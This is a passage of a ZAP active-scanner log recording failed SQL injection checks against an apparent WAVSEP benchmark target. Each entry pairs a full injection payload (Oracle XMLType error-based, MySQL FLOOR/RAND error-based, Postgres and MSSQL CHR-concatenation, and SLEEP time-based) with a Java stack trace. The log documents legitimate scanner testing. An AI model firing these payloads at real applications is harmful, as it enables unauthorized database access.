org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682080 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2583=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2583=2583) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- vFhM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 2583=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2583=2583) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- vFhM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682081 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 7078 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7078=7078,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 7078 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(7078=7078,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682082 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3369=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3369=3369) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'GYmm'='GYmm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 3369=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3369=3369) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'GYmm'='GYmm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682082 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(6015=6015,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(6015=6015,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682083 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1718=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1718=1718) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 1718=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1718=1718) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682083 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9721=9721) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9721=9721) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682084 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9726=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9726=9726) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- PtXL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9726=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9726=9726) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- PtXL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682084 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2843=2843) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2843=2843) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682085 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 1048 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1048=1048,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 1048 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1048=1048,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682088 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);(SELECT * FROM (SELECT(SLEEP(5)))xEms)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);(SELECT * FROM (SELECT(SLEEP(5)))xEms)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682090 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(9575=9575,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(9575=9575,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682091 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8289=8289) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8289=8289) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at 